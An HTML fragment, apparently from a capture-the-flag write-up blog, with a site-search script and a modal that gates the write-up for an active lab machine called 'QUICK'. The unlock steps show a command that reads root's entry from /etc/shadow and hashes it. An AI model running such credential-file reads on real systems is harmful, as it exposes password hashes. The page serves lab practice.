src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js" integrity="sha256-qcLR00zq6pJk4je3MLgAri8Nn+ZumUlXgTKR2H/xCY0=" crossorigin="anonymous"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://zeroryuki.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script><div class="modal fade" id="howModal" tabindex="-1" role="dialog" aria-hidden="true" style="display: none;"><div class="modal-dialog"><div class="modal-content"><div class="modal-header text-center"><div class="row"><div class="col-lg-12"> <img src="/img/Quick/icon.png" style="height: 40px"><h4 data-toc-skip class="modal-title">QUICK</h4><small>This is an active Linux machine. You will need root's shadow hash to read the content</small><br></div></div></div><div class="modal-body"><div class="row"><div class="col-lg-12"><h4 data-toc-skip>How to unlock</h4><span class="subscriptionInfo"><p><i class="fas fa-hashtag"></i> Get machine's root Shadow<br> <code class="highlighter-rouge"><small>cat /etc/shadow | grep root</small></code></p><p><i class="fas fa-hashtag"></i> Hash<br> <code class="highlighter-rouge"><small>echo "{shadow value}" | md5sum</small></code></p><p><i class="fas fa-sign-in-alt"></i> Add hash below</p></span><div class="row"><div class="col-lg-8"> <input type="text" placeholder="Insert hash here.." value="" name="key" id="key" class="form-control"></div><div class="col-lg-4"> <span role="button" tabindex="0"> <button id="decrypt" tabindex="-1" type="submit" class="decrypt-btn" style="background-color: rgb(154, 204, 20); border-color: rgb(154, 204, 20); color: white;"> Decrypt </button> </span></div></div></div><div class="col-lg-12 text-center m-t-md" id="recurlyBalanceControlPanel"> You have <span class="text-warning">-</span> remaining attempt</div></div></div><div class="modal-footer"> <button type="button" class="btn btn-default" data-dismiss="modal"><i class="far fa-times"></i></button></div></div></div></div>
